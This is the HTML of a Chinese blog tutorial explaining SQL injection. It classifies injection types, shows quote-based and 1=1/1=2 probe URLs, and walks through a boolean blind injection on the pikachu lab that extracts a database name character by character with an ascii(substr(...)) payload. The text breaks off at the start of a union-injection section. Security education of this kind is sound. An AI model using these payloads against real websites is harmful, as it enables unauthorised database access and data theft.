<!DOCTYPE html>
<html>
  <!-- meta/link... -->
  



<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <!-- Global site tag (gtag.js) - Google Analytics -->


  <title>SQL注入漏洞详解 | YY&#39;s Blog</title>

  <link rel="icon" type="image/jpeg" href="/medias/favicon.jpg">
  <link rel="stylesheet" href="https://at.alicdn.com/t/font_1911880_c1nvbyezg17.css">
  <link href="https://unpkg.com/@fortawesome/fontawesome-free/css/all.min.css" rel="stylesheet">
  <link href="/js/swiper/swiper@5.4.1.min.css" rel="stylesheet">
  
  
  
  
<link rel="stylesheet" href="/css/animate.min.css">

  
<link rel="stylesheet" href="/css/style.css">

  
  
    
<link rel="stylesheet" href="/js/fancybox/jquery.fancybox.min.css">

  
  
    
<link rel="stylesheet" href="/js/shareJs/share.min.css">

  
  <style>
        @media (max-width: 992px) {
            #waifu {
                display: none;
            }
        }
    </style>
    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/pink/pace-theme-flash.css" rel="stylesheet">

    
        <script src="/js/valine/index.js"></script>
    

    <!-- import link -->
    
        
            
        
            
        
    
    <!-- import script -->
    
        
            <script>function blog_time() {window.setTimeout(blog_time,1000);const now = new Date();const copyrightTime = now.getFullYear();			display_copyright_time.innerHTML = " "+copyrightTime;}blog_time();</script>
        
            <script>function blog_live_time() {window.setTimeout(blog_live_time, 1000);const start = new Date('2020-10-01T00:00:00');const now = new Date();const timeDiff = (now.getTime() - start.getTime());					  const msPerMinute = 60 * 1000;					  const msPerHour = 60 * msPerMinute;					  const msPerDay = 24 * msPerHour;					  const passDay = Math.floor(timeDiff / msPerDay);					  const passHour = Math.floor((timeDiff % msPerDay) / 60 / 60 / 1000);					  const passMinute = Math.floor((timeDiff % msPerHour) / 60 / 1000);const passSecond = Math.floor((timeDiff % msPerMinute) / 1000);display_live_time.innerHTML = " " + passDay + " 天 " + passHour + " 小时 " + passMinute + " 分 " + passSecond + " 秒";}blog_live_time();</script>
        
    

    <!-- import daovoice -->
    

        <script>(function (i, s, o, g, r, a, m) {
            i['DaoVoiceObject'] = r;
            i[r] = i[r] ||
              function () {
                (i[r].q = i[r].q || []).push(arguments);
              };
            i[r].l = 1 * new Date();
            a = s.createElement(o);
            m = s.getElementsByTagName(o)[0];
            a.async = 1;
            a.src = g;
            a.charset = 'utf-8';
            m.parentNode.insertBefore(a, m);
          })(window, document, 'script', ('https:' === document.location.protocol ? 'https:' : 'http:') + "//widget.daovoice.io/widget/5a027b89.js", 'daovoice');
          daovoice('init', {
            app_id: "5a027b89",
          });
          daovoice('update');
        </script>
      
    
<meta name="generator" content="Hexo 5.4.0"></head>

  
  <!-- 依赖于jquery和vue -->
  
    
<script src="https://unpkg.com/jquery@3.5.1/dist/jquery.min.js"></script>

  

  
    
<script src="https://unpkg.com/vue@2.6.11/dist/vue.min.js"></script>

  
  
  <body>
    <!-- 预加载动画 -->
    <!-- 页面预加载动画 -->

<div id='loader'>
  <link rel="stylesheet" href="/js/loaded/index.css" >
  <div class="loading-left-bg"></div>
  <div class="loading-right-bg"></div>
  <div class="spinner-box">
    <div class="configure-border-1">
      <div class="configure-core"></div>
    </div>
    <div class="configure-border-2">
      <div class="configure-core"></div>
    </div>
    <div class="loading-word">加载中...</div>
  </div>
</div>

<script>
  var endLoading = function () {
    document.body.style.overflow = 'auto';
    document.getElementById('loader').classList.add("loading");
  }
  window.addEventListener('DOMContentLoaded',endLoading);
  
</script>

    
    <!-- 判断是否为暗黑风格 -->
    <!-- 判断是否为黑夜模式 -->
<script>
  let isDark = JSON.parse(localStorage.getItem('dark')) || JSON.parse('false');

  if (isDark) {
    $(document.body).addClass('darkModel');
  }
</script>

    <!-- 需要在上面加载的js -->
    <script>
  function loadScript(src, cb) {
    return new Promise(resolve => {
      setTimeout(function () {
        var HEAD = document.getElementsByTagName("head")[0] || document.documentElement;
        var script = document.createElement("script");
        script.setAttribute("type", "text/javascript");
        if (cb) {
          if (JSON.stringify(cb)) {
            for (let p in cb) {
              if (p == "onload") {
                script[p] = () => {
                  cb[p]()
                  resolve()
                }
              } else {
                script[p] = cb[p]
                script.onload = resolve
              }
            }
          } else {
            script.onload = () => {
              cb()
              resolve()
            };
          }
        } else {
          script.onload = resolve
        }
        script.setAttribute("src", src);
        HEAD.appendChild(script);
      });
    });
  }

  //https://github.com/filamentgroup/loadCSS
  var loadCSS = function (href, before, media, attributes) {
    return new Promise(resolve => {
      setTimeout(function () {
        var link = document.createElement('link');
        link.rel = "stylesheet";
        link.href = src;
        link.onload = resolve;
        document.getElementsByTagName("head")[0].appendChild(link);
      });
    });
  };

</script> 

<!-- 轮播图所需要的js -->
<script src="/js/swiper/swiper.min.js"></script>
<script src="/js/swiper/vue-awesome-swiper.js"></script>
<script src="/js/swiper/swiper.animate1.0.3.min.js"></script>

<script type="text/javascript">
  Vue.use(window.VueAwesomeSwiper)
</script>


  <script src="/js/vue-typed-js/index.js"></script>


<!-- 首页的公告滚动插件的js需要重新加载 -->
<script src="/js/vue-seamless-scroll/index.js"></script>

<!-- 打字机效果js -->
<script src="https://unpkg.com/typed.js@2.0.11"></script>


    <div id="safearea">
      <main class="main" id="pjax-container">
        <!-- 头部导航 -->
        
<header class="header   " 
  id="navHeader"
  style="position: fixed;
  left: 0; top: 0; z-index: 10;width: 100%;"
>
  <div class="header-content">
    <div class="bars">
      <div id="appDrawer" class="sidebar-image">
  <div class="drawer-box-icon">
    <i class="fas fa-bars" aria-hidden="true" @click="showDialogDrawer"></i>
  </div>
  
  <transition name="fade">
    <div class="drawer-box_mask" v-cloak style="display: none;" v-show="visible" @click.self="cancelDialogDrawer">
    </div>
  </transition>
  <div class="drawer-box" :class="{'active': visible}">
    <div class="drawer-box-head bg-color">
      <img class="drawer-box-head_logo lazyload placeholder" src="/medias/logo.png" class="lazyload placeholder" data-srcset="/medias/logo.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="logo">
      <h3 class="drawer-box-head_title">YY&#39;s Blog</h3>
      <h5 class="drawer-box-head_desc">三十年河东，三十年河西，莫欺少年穷！</h5>
    </div>
    
    <div class="drawer-box-content">
      <ul class="drawer-box-content_menu">
        
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/" class="drawer-menu-item-link">
                  
                    <i class="fa fa-home" aria-hidden="true"></i>
                  
                  <span class="name">首页</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/archives" class="drawer-menu-item-link">
                  
                    <i class="fa fa-archive" aria-hidden="true"></i>
                  
                  <span class="name">归档</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/tags" class="drawer-menu-item-link">
                  
                    <i class="fa fa-tags" aria-hidden="true"></i>
                  
                  <span class="name">标签</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/categories" class="drawer-menu-item-link">
                  
                    <i class="fa fa-bookmark" aria-hidden="true"></i>
                  
                  <span class="name">分类</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/about" class="drawer-menu-item-link">
                  
                    <i class="fa fa-user" aria-hidden="true"></i>
                  
                  <span class="name">关于</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/comments" class="drawer-menu-item-link">
                  
                    <i class="fa fa-comments" aria-hidden="true"></i>
                  
                  <span class="name">留言</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/friends" class="drawer-menu-item-link">
                  
                    <i class="fa fa-book" aria-hidden="true"></i>
                  
                  <span class="name">友情链接</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="/love" class="drawer-menu-item-link">
                  
                    <i class="fa fa-heart" aria-hidden="true"></i>
                  
                  <span class="name">Love</span>
                </a>
              
            </li>
          
            <li class="drawer-box-content_item" style="position: relative;">
              
                <a href="javascript:;" class="drawer-menu-item-link has-children" @click="openOrCloseMenu(8)">
                  <span>
                    
                      <i class="fa fa-link"></i>
                    
                    <span class="name">更多</span>
                  </span>
                  <i class="fas fa-chevron-left arrow " :class="{'icon-rotate': isOpen(8)}" aria-hidden="true"></i>
                </a>
                <ul class="drawer-sub-menu" v-if="isOpen(8)">
                  
                  <li>
                    <a href="/gallery">
                      
                      <i class="fa fa-music" style="margin-top: -20px;"></i>
                      
                      <span>图库</span>
                    </a>
                  </li>
                  
                  <li>
                    <a href="/me">
                      
                      <i class="fa fa-user" style="margin-top: -20px;"></i>
                      
                      <span>关于我</span>
                    </a>
                  </li>
                  
                  <li>
                    <a href="/resources">
                      
                      <i class="fa fa-film" style="margin-top: -20px;"></i>
                      
                      <span>资源</span>
                    </a>
                  </li>
                  
                  <li>
                    <a target="_blank" rel="noopener" href="http://baidu.com">
                      
                      <i class="fa fa-wifi" style="margin-top: -20px;"></i>
                      
                      <span>百度</span>
                    </a>
                  </li>
                  
                </ul>
              
            </li>
          
        
        
          <li class="drawer-box-content_item">
            <a target="_blank" rel="noopener" href="https://gitee.com/yangyang-linux">
              <i class="fas fa-github" aria-hidden="true"></i>
              <span>Github</span>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</div>

<script>
  var body = document.body || document.documentElement || window;
  var vm = new Vue({
    el: '#appDrawer',
    data: {
      visible: false,
      top: 0,
      openArr: [],
    },
    computed: {
    },
    mounted() {
    },
    methods: {
      isOpen(index) {
        if (this.openArr.includes(index)) {
          return true;
        } else {
          return false;
        }
      },
      openOrCloseMenu(curIndex) {
        const index = this.openArr.indexOf(curIndex);
        if (index !== -1) {
          this.openArr.splice(index, 1);
        } else {
          this.openArr.push(curIndex);
        }
      },
      showDialogDrawer() {
        this.visible = true;
        // 防止页面滚动，只能让弹框滚动
        this.top = $(document).scrollTop()
        body.style.cssText = 'width: 100%; height: 100%;overflow: hidden;';
      },
      cancelDialogDrawer() {
        this.visible = false;
        body.removeAttribute('style');
        $(document).scrollTop(this.top)
      }
    },
    created() {}
  })
</script>

    </div>
    <div class="blog-title" id="author-avatar">
      
        <div class="avatar">
          <img src="/medias/logo.png" class="lazyload placeholder" data-srcset="/medias/logo.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="logo">
        </div>
      
      <a href="/" class="logo">YY&#39;s Blog</a>
    </div>
    <nav class="navbar">
      <ul class="menu">
        
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/" class="menu-item-link" title="首页">
                  
                    <i class="fa fa-home" aria-hidden="true"></i>
                  
                  <span class="name">首页</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/archives" class="menu-item-link" title="归档">
                  
                    <i class="fa fa-archive" aria-hidden="true"></i>
                  
                  <span class="name">归档</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/tags" class="menu-item-link" title="标签">
                  
                    <i class="fa fa-tags" aria-hidden="true"></i>
                  
                  <span class="name">标签</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/categories" class="menu-item-link" title="分类">
                  
                    <i class="fa fa-bookmark" aria-hidden="true"></i>
                  
                  <span class="name">分类</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/about" class="menu-item-link" title="关于">
                  
                    <i class="fa fa-user" aria-hidden="true"></i>
                  
                  <span class="name">关于</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/comments" class="menu-item-link" title="留言">
                  
                    <i class="fa fa-comments" aria-hidden="true"></i>
                  
                  <span class="name">留言</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/friends" class="menu-item-link" title="友情链接">
                  
                    <i class="fa fa-book" aria-hidden="true"></i>
                  
                  <span class="name">友情链接</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="/love" class="menu-item-link" title="Love">
                  
                    <i class="fa fa-heart" aria-hidden="true"></i>
                  
                  <span class="name">Love</span>
                </a>
              
            </li>
          
            <li class="menu-item" style="position: relative;">
              
                <a href="javascript:;" class="menu-item-link" title="更多">
                  
                    <i class="fa fa-link"></i>
                  
                  <span class="name">更多</span>
                  <i class="fas fa-chevron-down arrow" aria-hidden="true"></i>
                </a>
                <ul class="sub-menu">
                  
                  <li>
                    <a href="/gallery">
                      
                      <i class="fa fa-music" style="margin-top: -20px;"></i>
                      
                      <span>图库</span>
                    </a>
                  </li>
                  
                  <li>
                    <a href="/me">
                      
                      <i class="fa fa-user" style="margin-top: -20px;"></i>
                      
                      <span>关于我</span>
                    </a>
                  </li>
                  
                  <li>
                    <a href="/resources">
                      
                      <i class="fa fa-film" style="margin-top: -20px;"></i>
                      
                      <span>资源</span>
                    </a>
                  </li>
                  
                  <li>
                    <a target="_blank" rel="noopener" href="http://baidu.com">
                      
                      <i class="fa fa-wifi" style="margin-top: -20px;"></i>
                      
                      <span>百度</span>
                    </a>
                  </li>
                  
                </ul>
              
            </li>
          
        
      </ul>
      
      
        <div id="appSearch">
  <div class="search"  @click="showDialog()"><i class="fas fa-search" aria-hidden="true"></i></div>
  <transition name="fade">
    <div class="message-box_wrapper" style="display: none;" v-cloak v-show="dialogVisible" @click.self="cancelDialogVisible()">
      <div class="message-box animated bounceInDown">
        <h2>
          <span>
            <i class="fas fa-search" aria-hidden="true"></i>
            <span class="title">本地搜索</span>
          </span>
          <i class="fas fa-times close" pointer style="float:right;" aria-hidden="true" @click.self="cancelDialogVisible()"></i>
        </h2>
        <form class="site-search-form">
          <input type="text"
            placeholder="请输入关键字"
            id="local-search-input" 
            @click="getSearchFile()"
            class="st-search-input"
            v-model="searchInput"
          />
        </form>
        <div class="result-wrapper">
          <div id="local-search-result" class="local-search-result-cls"></div>
        </div>
      </div>
    </div>
  </transition>
</div>
<script src="/js/local_search.js"></script>
<script>
  var body = document.body || document.documentElement || window;
  var vm = new Vue({
    el: '#appSearch',
    data: {
      dialogVisible: false,
      searchInput: '',
      top: 0,
    },
    computed: {
    },
    mounted() {
      window.addEventListener('pjax:complete', () => {
        this.cancelDialogVisible();
      })
    },
    methods: {
      showDialog() {
        this.dialogVisible = true;
        // 防止页面滚动，只能让弹框滚动
        this.top = $(document).scrollTop()
        body.style.cssText = 'overflow: hidden;';
      },
      getSearchFile() {
        if (!this.searchInput) {
          getSearchFile("/search.xml");
        }
      },
      cancelDialogVisible() {
        this.dialogVisible = false;
        body.removeAttribute('style');
        $(document).scrollTop(this.top)
      },
    },
    created() {}
  })
</script>
<!-- 解决刷新页面闪烁问题，可以在元素上添加display: none, 或者用vue.extend方法，详情：https://blog.csdn.net/qq_31393401/article/details/81017912 -->
<!-- 下面是搜索基本写法 -->
<!-- <script type="text/javascript" id="local.search.active">
  var inputArea = document.querySelector("#local-search-input");
  inputArea.onclick   = function(){ getSearchFile(); this.onclick = null }
  inputArea.onkeydown = function(){ if(event.keyCode == 13) return false }
</script> -->

      

    </nav>
  </div>
  
    <a target="_blank" rel="noopener" href="https://gitee.com/yangyang-linux" class="github-corner color-primary" aria-label="View source on GitHub"><svg width="60" height="60" viewBox="0 0 250 250" style="fill:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
  
  
    <div id="he-plugin-simple"></div>
    <script>
      WIDGET = {
        CONFIG: {
          "modules": "012",
          "background": 5,
          "tmpColor": "4A4A4A",
          "tmpSize": 16,
          "cityColor": "4A4A4A",
          "citySize": 16,
          "aqiSize": 16,
          "weatherIconSize": 24,
          "alertIconSize": 18,
          "padding": "10px 10px 10px 10px",
          "shadow": "1",
          "language": "auto",
          "borderRadius": 5,
          "fixed": "false",
          "vertical": "middle",
          "horizontal": "center",
          "key": "2784dd3fcb1e4f0f9a9b579bf69641f2"
        }
      }
    </script>
    <script src="https://widget.qweather.net/simple/static/js/he-simple-common.js?v=2.0"></script> 
    
</header>
        <!-- 内容区域 -->
        
 <!-- prismjs 代码高亮 -->
 


<div class="bg-dark-floor" style="position: fixed;left: 0;top: 0;width: 100%;height: 100%;z-index: -1;"></div>


  <!-- 文章详情页顶部图片和标题 -->




<div class="post-detail-header" id="thumbnail_canvas" style="background-repeat: no-repeat; background-size: cover; 
  background-position: center center;position: relative;background-image:url('/medias/4.jpg')">
  <div class="post-detail-header-mask"></div>
  <canvas id="header_canvas"style="position:absolute;bottom:0;pointer-events:none;"></canvas>
  
  <div class="post-detail-header_info-box">
    <div class="title-box">
      <span class="title">
        SQL注入漏洞详解
      </span>
    </div>
    
    
      
        <span class="post-detail-header_date">
          <i class="fas fa-calendar"></i> 发表于：2021-06-27 |
        </span>
      

      

      
        <div class="post-detail-header_wordcount">
          <span class="totalcount">
            <i class="fas fa-file-text-o"></i> 字数统计: 5.9k |
          </span>
  
          <span class="min2read">
            <i class="fas fa-clock"></i> 阅读时长: 23分钟 |
          </span>
  
          
            <span class="reading">
              <i class="fas fa-eye"></i> 阅读量：<span id="busuanzi_value_page_pv"></span>
            </span>
          
        </div>
      
    
  </div>
  
  
    <script src="/js/bubble/bubble.js"></script>
  
</div>





<div class="row justify-position" 
  style="padding-top: 0px;">
  <div class="main-content">
    <article class="post post-detail">
      <div class="post-content">
        <h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h2><ul>
<li><p><strong>原理：</strong>就是通过把SQL命令<strong>插入</strong>到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。</p>
<p>具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RY0WnS"><img src="https://z3.ax1x.com/2021/06/27/RY0WnS.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RY0WnS.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RY0WnS.png"></a></p>
</li>
</ul>
<h2 id="SQL注入的分类"><a href="#SQL注入的分类" class="headerlink" title="SQL注入的分类"></a>SQL注入的分类</h2><ul>
<li><p><strong>一句注入点类型分类</strong></p>
<ul>
<li>数字类型的注入</li>
<li>字符串类型的注入</li>
<li>搜索型注入</li>
</ul>
</li>
<li><p><strong>依据提交方式分类</strong></p>
<ul>
<li>GET注入</li>
<li>POST注入</li>
<li>COOKIE注入</li>
<li>HTTP头注入(<a target="_blank" rel="noopener" href="https://www.cnblogs.com/aw4ke/p/11905576.html">XFF注入</a>、UA注入、REFERER注入）</li>
</ul>
</li>
<li><p><strong>依据获取信息的方式分类</strong></p>
<ul>
<li><p>盲注</p>
<ul>
<li>基于布尔的盲注</li>
<li>基于时间的盲注</li>
</ul>
</li>
<li><p>基于报错的注入</p>
</li>
<li><p>union</p>
<ul>
<li>联合查询注入</li>
<li>堆查询注入 (可同时执行多条语句)</li>
</ul>
</li>
</ul>
</li>
<li><p>编码问题</p>
<ul>
<li>宽字节注入</li>
</ul>
</li>
</ul>
<h2 id="怎么判断存在SQL注入"><a href="#怎么判断存在SQL注入" class="headerlink" title="怎么判断存在SQL注入"></a>怎么判断存在SQL注入</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">方法：</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="number">1.</span>整形参数判断</span><br><span class="line"></span><br><span class="line">通常news.asp中<span class="keyword">SQL</span>语句原貌大致如下：<span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> 表名 <span class="keyword">where</span> 字段<span class="operator">=</span>xx，所以可以用以下步骤测试<span class="keyword">SQL</span>注入是否存在。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">最简单的判断方法：http:<span class="operator">/</span><span class="operator">/</span>xxx<span class="operator">/</span>news.asp?id<span class="operator">=</span>xx’(附加一个单引号)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="number">2.</span> 字符串型参数判断</span><br><span class="line"></span><br><span class="line">通常news.asp中<span class="keyword">SQL</span>语句原貌大致如下：</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> 表名 <span class="keyword">where</span> 字段<span class="operator">=</span><span class="string">&#x27;xx&#x27;</span>，所以可以用以下步骤测试<span class="keyword">SQL</span>注入是否存在。</span><br><span class="line"></span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span>xxx<span class="operator">/</span>news.asp?id<span class="operator">=</span>xx’(附加一个单引号)，此时news.asp中的<span class="keyword">SQL</span>语句变成了</span><br><span class="line"></span><br><span class="line"><span class="keyword">select</span> <span class="operator">*</span> <span class="keyword">from</span> 表名 <span class="keyword">where</span> 字段<span class="operator">=</span>xx’，news.asp运行异常；</span><br><span class="line"></span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span>xxx<span class="operator">/</span>news.asp?id<span class="operator">=</span>xx <span class="keyword">and</span> <span class="string">&#x27;1&#x27;</span><span class="operator">=</span><span class="string">&#x27;1&#x27;</span>, news.asp运行正常，</span><br><span class="line"></span><br><span class="line">而且与 http:<span class="operator">/</span><span class="operator">/</span>www.hackbase.com<span class="operator">/</span>news.asp?id<span class="operator">=</span>xx运行结果相同；</span><br><span class="line"></span><br><span class="line">http:<span class="operator">/</span><span class="operator">/</span>xxx<span class="operator">/</span>news.asp?id<span class="operator">=</span>xx <span class="keyword">and</span> <span class="string">&#x27;1&#x27;</span><span class="operator">=</span><span class="string">&#x27;2&#x27;</span>, news.asp运行异常；</span><br><span class="line"></span><br><span class="line">如果以上满足，则news.asp存在<span class="keyword">SQL</span>注入漏洞，反之则不能注入</span><br></pre></td></tr></table></figure>

<h4 id="Boolean盲注"><a href="#Boolean盲注" class="headerlink" title="Boolean盲注"></a>Boolean盲注</h4><p><strong>盲注，</strong>就是在服务器没有错误回显时完成的注入攻击。服务器没有错误回显，对于攻击者来说缺少了非常重要的信息，所以攻击者必须找到一个方法来验证注入的SQL语句是否得到了执行。</p>
<p>下面我们用打开pikachu测试平台，选择sql盲注boolian章节进行演示：</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrrtJ"><img src="https://z3.ax1x.com/2021/06/27/RYrrtJ.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrrtJ.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrrtJ.png"></a></p>
<p>先输入’ 测试一下反馈信息</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrWnK"><img src="https://z3.ax1x.com/2021/06/27/RYrWnK.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrWnK.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrWnK.png"></a></p>
<p>输入一个之前注册的真实信息</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrh7D"><img src="https://z3.ax1x.com/2021/06/27/RYrh7D.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrh7D.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrh7D.png"></a></p>
<p>发现回馈正确信息，输入kobe’ and 1=1# 发现反馈仍然为正确信息</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrItH"><img src="https://z3.ax1x.com/2021/06/27/RYrItH.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrItH.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrItH.png"></a></p>
<p>将1=1改成1=2，错误的值，发现报错。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrqjP"><img src="https://z3.ax1x.com/2021/06/27/RYrqjP.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrqjP.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrqjP.png"></a></p>
<p>所以，我们可以从and 1=1判断真假来做工作了，输入之前基于报错的字符kobe’ and ascii(substr(database(),1,1))&gt;113#，将database的名字取第一个字符，转换为asc码的形式进行对比。发现反馈输入错误。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrjHS"><img src="https://z3.ax1x.com/2021/06/27/RYrjHS.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrjHS.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrjHS.png"></a></p>
<p>反馈信息报错，以此修改113的数值，直到反馈正确信息。</p>
<p><a target="_blank" rel="noopener" href="https://imgtu.com/i/RYrxAg"><img src="https://z3.ax1x.com/2021/06/27/RYrxAg.png" class="lazyload placeholder" data-srcset="https://z3.ax1x.com/2021/06/27/RYrxAg.png" srcset="https://img10.360buyimg.com/ddimg/jfs/t1/157667/29/9156/134350/603c6445Ebbc9cabe/41219c5d36d45072.gif" alt="RYrxAg.png"></a></p>
<p>这里到112的时候。显示正确信息，说明数据库第一个字符的asc码为112，即P。<br>这里，就盲注完成了。</p>
<h4 id="union注入"><a href="#union注入" class="headerlink" title="union注入"></a>union注入</h4><figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br></pre></td><td class="code"><pre><span class="line">union联合查询适用于有显示列的注入。</span><br><span class="line"></span><br><span class="line">用sql-labs来学习</span><br><span class="line">这是第一个</span><br><span 